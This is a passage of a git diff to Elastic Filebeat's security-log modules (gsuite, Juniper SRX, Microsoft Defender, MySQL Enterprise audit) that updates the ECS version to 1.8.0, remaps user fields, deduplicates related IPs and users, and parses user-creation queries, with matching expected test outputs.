evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "success"); break; case "logout": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["end"]); break; case "account_disabled_generic": @@ -83,9 +86,25 @@ var login = (function () { evt.Delete("json.events.parameters"); }; + var addTargetUser = function(evt) { + var affectedEmail = evt.Get("google_workspace.login.affected_email_address"); + if (affectedEmail) { + evt.Put("user.target.email", affectedEmail); + var data = affectedEmail.split("@"); + if (data.length !== 2) { + return; + } + + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.AppendTo("related.user", data[0]); + } + }; + var pipeline = new processor.Chain() .Add(categorizeEvent) .Add(processParams) + .Add(addTargetUser) .Build(); return { diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 287e6245a25e..261bf54dbf6c 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_generic", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_spamming_through_relay", @@ -144,7 +150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_spamming", @@ -193,7 +202,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "gov_attack_warning", @@ -240,12 +252,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -291,7 +307,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_challenge", @@ -341,7 +360,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_verification", @@ -392,12 +414,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "logout", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -440,12 +466,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -491,6 +521,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/saml/config/config.yml b/x-pack/filebeat/module/gsuite/saml/config/config.yml index e7d9992f0455..62f1e7d9f4e6 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/config.yml +++ b/x-pack/filebeat/module/gsuite/saml/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 3ad58062823d..2011e6d437b2 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js @@ -7,7 +7,7 @@ var saml = (function () { var categorizeEvent = function(evt) { evt.Put("event.type", ["start"]); - evt.Put("event.category", ["authentication"]); + evt.Put("event.category", ["authentication", "session"]); switch (evt.Get("event.action")) { case "login_failure": evt.Put("event.outcome", "failure"); diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 6dd2d0216b05..850766be83d3 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json @@ -2,7 +2,8 @@ { "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.saml", "event.id": "1", @@ -51,12 +52,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.saml", "event.id": "1", @@ -103,6 +108,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml index 09cba1a7fd27..c6aa5ded1441 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json index 689aad5cde25..5943488f3241 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json @@ -45,7 +45,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "2sv_enroll", @@ -93,7 +96,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "password_edit", @@ -141,7 +147,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_email_edit", @@ -189,7 +198,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_phone_edit", @@ -237,7 +249,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_secret_qa_edit", @@ -285,7 +300,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "titanium_enroll", @@ -333,7 +351,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "titanium_unenroll", @@ -381,6 +402,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml index e433632b7a89..ac21107959cb 100644 --- a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml +++ b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/imperva/securesphere/config/input.yml b/x-pack/filebeat/module/imperva/securesphere/config/input.yml index d7c7e0ba749a..51f37f33c882 100644 --- a/x-pack/filebeat/module/imperva/securesphere/config/input.yml +++ b/x-pack/filebeat/module/imperva/securesphere/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/infoblox/nios/config/input.yml b/x-pack/filebeat/module/infoblox/nios/config/input.yml index 48403d0a09c1..6f404d2ce465 100644 --- a/x-pack/filebeat/module/infoblox/nios/config/input.yml +++ b/x-pack/filebeat/module/infoblox/nios/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/iptables/log/config/input.yml b/x-pack/filebeat/module/iptables/log/config/input.yml index b247428d1381..5226893b62c9 100644 --- a/x-pack/filebeat/module/iptables/log/config/input.yml +++ b/x-pack/filebeat/module/iptables/log/config/input.yml @@ -55,4 +55,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/junos/config/input.yml b/x-pack/filebeat/module/juniper/junos/config/input.yml index 088629b28ba2..6c3777a8325c 100644 --- a/x-pack/filebeat/module/juniper/junos/config/input.yml +++ b/x-pack/filebeat/module/juniper/junos/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/netscreen/config/input.yml b/x-pack/filebeat/module/juniper/netscreen/config/input.yml index 0ec5bf4cda1e..8316e26b292a 100644 --- a/x-pack/filebeat/module/juniper/netscreen/config/input.yml +++ b/x-pack/filebeat/module/juniper/netscreen/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/srx/config/srx.yml b/x-pack/filebeat/module/juniper/srx/config/srx.yml index 6af16945317c..021eca1c9645 100644 --- a/x-pack/filebeat/module/juniper/srx/config/srx.yml +++ b/x-pack/filebeat/module/juniper/srx/config/srx.yml @@ -28,4 +28,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml b/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml index 9fb9057b8fa8..a7d4b22ee7ed 100644 --- a/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml +++ b/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml @@ -238,37 +238,57 @@ processors: field: related.ip value: '{{source.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.destination?.ip != null' field: related.ip value: '{{destination.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.source?.nat?.ip != null' field: related.ip value: '{{source.nat.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx?.destination?.nat?.ip != null' field: related.ip value: '{{destination.nat.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.url?.domain != null' field: related.hosts value: '{{url.domain}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.source?.domain != null' field: related.hosts value: '{{source.domain}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.destination?.domain != null' field: related.hosts value: '{{destination.domain}}' ignore_failure: true + allow_duplicates: false + +- append: + if: 'ctx?.source?.user?.name != null' + field: related.user + value: '{{source.user.name}}' + ignore_failure: true + allow_duplicates: false +- append: + if: 'ctx?.destination?.user?.name != null' + field: related.user + value: '{{destination.user.name}}' + ignore_failure: true + allow_duplicates: false on_failure: - set: diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json index 69639938252b..9227f428e4a1 100644 --- a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json @@ -58,6 +58,9 @@ "10.10.10.1", "187.19.188.200" ], + "related.user": [ + "user1" + ], "server.ip": "187.19.188.200", "server.port": 80, "service.type": "juniper", @@ -110,6 +113,9 @@ "related.ip": [ "192.0.2.0" ], + "related.user": [ + "admin" + ], "service.type": "juniper", "source.domain": "host.example.com", "source.ip": "192.0.2.0", diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json index 9eb70c83a645..622200c634ae 100644 --- a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json @@ -44,8 +44,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "10.0.0.1", - "10.128.0.1", "10.0.0.1", "10.128.0.1" ], @@ -245,8 +243,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "1.2.3.4", - "5.6.7.8", "1.2.3.4", "5.6.7.8" ], @@ -323,8 +319,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "50.0.0.100", - "30.0.0.100", "50.0.0.100", "30.0.0.100" ], @@ -396,7 +390,6 @@ "related.ip": [ "192.0.2.1", "198.51.100.12", - "192.0.2.1", "18.51.100.12" ], "rule.name": "policy1", @@ -472,7 +465,6 @@ "related.ip": [ "192.0.2.1", "198.51.100.12", - "192.0.2.1", "18.51.100.12" ], "rule.name": "policy1", @@ -563,8 +555,7 @@ "related.ip": [ "10.3.255.203", "8.23.224.110", - "10.3.136.49", - "8.23.224.110" + "10.3.136.49" ], "rule.name": "permit_all", "server.bytes": 535, @@ -636,8 +627,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "192.168.2.164", - "172.16.1.19", "192.168.2.164", "172.16.1.19" ], @@ -722,8 +711,7 @@ "related.ip": [ "100.73.10.92", "58.68.126.198", - "58.78.140.131", - "58.68.126.198" + "58.78.140.131" ], "rule.name": "NAT", "server.bytes": 136, @@ -816,8 +804,7 @@ "related.ip": [ "192.168.255.2", "8.8.8.8", - "192.168.0.47", - "8.8.8.8" + "192.168.0.47" ], "rule.name": "trust-to-untrust-001", "server.bytes": 116, @@ -966,8 +953,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.ip": "207.17.137.56", @@ -1053,8 +1039,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.bytes": 0, @@ -1146,8 +1131,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.bytes": 104, @@ -1240,11 +1224,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 686432, "server.ip": "5.0.0.1", @@ -1328,11 +1313,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.ip": "5.0.0.1", "server.nat.port": 80, @@ -1417,11 +1403,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 646, "server.ip": "5.0.0.1", @@ -1495,8 +1482,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "50.0.0.100", - "30.0.0.100", "50.0.0.100", "30.0.0.100" ], @@ -1637,11 +1622,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 646, "server.ip": "5.0.0.1", @@ -1733,8 +1719,7 @@ "related.ip": [ "10.1.1.100", "46.165.154.241", - "172.19.34.100", - "46.165.154.241" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 2132, @@ -1829,8 +1814,7 @@ "related.ip": [ "10.1.1.100", "91.228.167.172", - "172.19.34.100", - "91.228.167.172" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 9670, @@ -1906,8 +1890,7 @@ "related.ip": [ "10.1.1.100", "8.8.8.8", - "172.19.34.100", - "8.8.8.8" + "172.19.34.100" ], "rule.name": "default-permit", "server.ip": "8.8.8.8", @@ -1989,8 +1972,7 @@ "related.ip": [ "10.1.1.100", "8.8.8.8", - "172.19.34.100", - "8.8.8.8" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 82, diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json index 8a5a73073558..71faf19efc7b 100644 --- a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json @@ -67,6 +67,9 @@ "0.0.0.0", "3.3.10.11" ], + "related.user": [ + "unknown-user" + ], "rule.id": "3", "rule.name": "IPS", "server.bytes": 0, @@ -155,6 +158,9 @@ "0.0.0.0", "3.3.10.11" ], + "related.user": [ + "unknown-user" + ], "rule.id": "3", "rule.name": "IPS", "server.bytes": 0, diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json index 6b0aa31072fa..1da203ed4510 100644 --- a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json @@ -49,6 +49,9 @@ "192.168.1.100", "103.235.46.39" ], + "related.user": [ + "user01" + ], "server.ip": "103.235.46.39", "server.port": 80, "service.type": "juniper", @@ -108,6 +111,9 @@ "10.10.10.50", "216.200.241.66" ], + "related.user": [ + "user02" + ], "server.ip": "216.200.241.66", "server.port": 80, "service.type": "juniper", @@ -320,6 +326,9 @@ "related.ip": [ "10.10.10.1" ], + "related.user": [ + "user01" + ], "service.type": "juniper", "source.ip": "10.10.10.1", "source.user.name": "user01", @@ -372,6 +381,9 @@ "192.0.2.3", "198.51.100.2" ], + "related.user": [ + "user01@testuser.com" + ], "server.ip": "198.51.100.2", "server.port": 80, "service.type": "juniper", @@ -433,6 +445,9 @@ "192.168.1.100", "103.235.46.39" ], + "related.user": [ + "user01" + ], "server.ip": "103.235.46.39", "server.port": 80, "service.type": "juniper", diff --git a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml index 9b9eda7e0942..d1e5c971b802 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml @@ -54,4 +54,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml b/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml index 0f35c753092f..b04d4b5d67fc 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml @@ -249,17 +249,34 @@ processors: ###################### - rename: field: json.relatedUser.userName - target_field: host.user.name + target_field: user.name ignore_missing: true - rename: field: json.relatedUser.domainName - target_field: host.user.domain + target_field: user.domain ignore_missing: true - rename: field: json.evidence.userSid - target_field: host.user.id + target_field: user.id ignore_missing: true +############################## +## ECS host.user Mapping ## +## Deprecated since ECS 1.8 ## +############################## +- set: + field: host.user.name + value: '{{user.name}}' + ignore_empty_value: true +- set: + field: host.user.domain + value: '{{user.domain}}' + ignore_empty_value: true +- set: + field: host.user.id + value: '{{user.id}}' + ignore_empty_value: true + ######################### ## ECS Related Mapping ## ######################### @@ -269,8 +286,8 @@ processors: if: ctx.json?.evidence?.ipAddress != null - append: field: related.user - value: '{{host.user.name}}' - if: ctx.host?.user?.name != null + value: '{{user.name}}' + if: ctx.user?.name != null - append: field: related.hash value: '{{file.hash.sha1}}' diff --git a/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json b/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json index 0423289d6ace..388aa8586a1c 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json +++ b/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json @@ -118,7 +118,9 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "DefenseEvasion" + "threat.technique.name": "DefenseEvasion", + "user.domain": "TestServer4", + "user.name": "administrator1" }, { "cloud.account.id": "43521344-d66c-4c7e-9e30-40034eb7c6f3", @@ -176,7 +178,10 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "DefenseEvasion" + "threat.technique.name": "DefenseEvasion", + "user.domain": "TestServer4", + "user.id": "S-1-5-21-46152456-1367606905-4031241297-500", + "user.name": "administrator1" }, { "cloud.account.id": "1234543-d66c-4c7e-9e30-40034eb7c6f3", diff --git a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml index 2d6d418b4d9a..0e77cbdf4917 100644 --- a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml +++ b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml index 4f07ff46be28..52ebe56c3b19 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml @@ -54,4 +54,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml b/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml index f1ea7c03abd6..ae33c77d6d5e 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/ingest/pipeline.yml @@ -227,17 +227,34 @@ processors: ###################### - rename: field: json.alerts.entities.userPrincipalName - target_field: host.user.name + target_field: user.name ignore_missing: true - rename: field: json.alerts.entities.domainName - target_field: host.user.domain + target_field: user.domain ignore_missing: true - rename: field: json.alerts.entities.aadUserId - target_field: host.user.id + target_field: user.id ignore_missing: true +############################## +## ECS host.user Mapping ## +## Deprecated since ECS 1.8 ## +############################## +- set: + field: host.user.name + value: '{{user.name}}' + ignore_empty_value: true +- set: + field: host.user.domain + value: '{{user.domain}}' + ignore_empty_value: true +- set: + field: host.user.id + value: '{{user.id}}' + ignore_empty_value: true + ######################### ## ECS Related Mapping ## ######################### @@ -247,8 +264,8 @@ processors: if: ctx.json?.entities?.ipAddress != null - append: field: related.user - value: '{{host.user.name}}' - if: ctx.host?.user?.name != null + value: '{{user.name}}' + if: ctx.user?.name != null - append: field: related.hash value: '{{file.hash.sha1}}' diff --git a/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json b/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json index 1f81a57a98fc..edd4b8ad091d 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json +++ b/x-pack/filebeat/module/microsoft/m365_defender/test/m365_defender-test.ndjson.log-expected.json @@ -556,7 +556,9 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "SuspiciousActivity" + "threat.technique.name": "SuspiciousActivity", + "user.id": "8e24c50a-a77c-4782-813f-965009b5ddf3", + "user.name": "brent@elasticbv.onmicrosoft.com" }, { "@timestamp": "2020-09-23T19:32:05.8366667Z", diff --git a/x-pack/filebeat/module/misp/threat/config/input.yml b/x-pack/filebeat/module/misp/threat/config/input.yml index 81deb7e5aa5e..488f0a249c02 100644 --- a/x-pack/filebeat/module/misp/threat/config/input.yml +++ b/x-pack/filebeat/module/misp/threat/config/input.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mssql/log/config/config.yml b/x-pack/filebeat/module/mssql/log/config/config.yml index 085cd033b37f..d908ffc950b9 100644 --- a/x-pack/filebeat/module/mssql/log/config/config.yml +++ b/x-pack/filebeat/module/mssql/log/config/config.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml index ec1ee8b09035..c62863d5ac80 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml b/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml index c9ec7375e71b..c0bb73d049e5 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/ingest/pipeline.yml @@ -23,7 +23,7 @@ processors: - append: field: event.category value: iam - if: '["create_user", "delete_user", "grant", "flush_privileges"].contains(ctx.mysqlenterprise.audit?.general_data?.sql_command)' + if: '["create_user", "delete_user", "drop_user", "grant", "flush_privileges"].contains(ctx.mysqlenterprise.audit?.general_data?.sql_command)' - append: field: event.type value: access @@ -128,6 +128,38 @@ processors: if (ctx.process.args.length > 0) { ctx.process.executable = ctx.process.args[0]; } +# Query parsing +- grok: + field: mysqlenterprise.audit.general_data.query + if: '["create_user", "delete_user", "drop_user"].contains(ctx.mysqlenterprise?.audit?.general_data?.sql_command)' + ignore_failure: true + patterns: + - '(?i)(?:CREATE|DROP)\s+USER(?:\s+IF\s+(?:NOT\s+)?EXISTS)?\s+(?:%{START_QUOTE}%{QUOTED:user.target.name}%{END_QUOTE}|%{UNQUOTED:user.target.name})(?:@(?:%{START_QUOTE}%{QUOTED:user.target.domain}%{END_QUOTE}|%{UNQUOTED:user.target.domain}))?' + pattern_definitions: + START_QUOTE: (?<__quote>['"`]) + QUOTED: (?~\k<__quote>) + END_QUOTE: (?:\k<__quote>) + UNQUOTED: (?:[^\s@;]*+) +- remove: + field: __quote + ignore_missing: true +- set: + field: user.name + value: '{{server.user.name}}' + ignore_empty_value: true + if: 'ctx.user?.target != null' +- append: + field: event.type + value: + - user + - creation + if: 'ctx.mysqlenterprise?.audit?.general_data?.sql_command == "create_user"' +- append: + field: event.type + value: + - user + - deletion + if: 'ctx.mysqlenterprise?.audit?.general_data?.sql_command == "drop_user" || ctx.mysqlenterprise?.audit?.general_data?.sql_command == "delete_user"' # Attributes starting with _ is only supported by MySQL 8.0.19 and above. - convert: @@ -138,23 +170,39 @@ processors: - append: field: related.user value: '{{server.user.name}}' + allow_duplicates: false if: ctx?.server?.user?.name != null - append: field: related.user value: '{{client.user.name}}' + allow_duplicates: false if: ctx?.client?.user?.name != null +- append: + field: related.user + value: '{{user.target.name}}' + allow_duplicates: false + if: ctx?.user?.target?.name != null - append: field: related.ip value: '{{client.ip}}' + allow_duplicates: false if: ctx?.client?.ip != null +- append: + field: related.hosts + value: '{{client.domain}}' + allow_duplicates: false + if: ctx?.client?.domain != null - date: field: mysqlenterprise.audit.timestamp formats: - yyyy-MM-dd HH:mm:ss if: ctx?.mysqlenterprise?.audit?.timestamp != null +- rename: + field: message + target_field: event.original + ignore_missing: true - remove: field: - - message - mysqlenterprise.audit.event - mysqlenterprise.audit.timestamp - mysqlenterprise.audit.connection_data.connection_attributes._pid diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log index 2bf3e31f37b9..79e8ac2cd218 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log +++ b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log @@ -9,7 +9,7 @@ { "timestamp": "2020-10-19 19:28:27", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'root'@'hades.home' IDENTIFIED BY 'password'", "status": 1064 } }, { "timestamp": "2020-10-19 19:28:54", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": 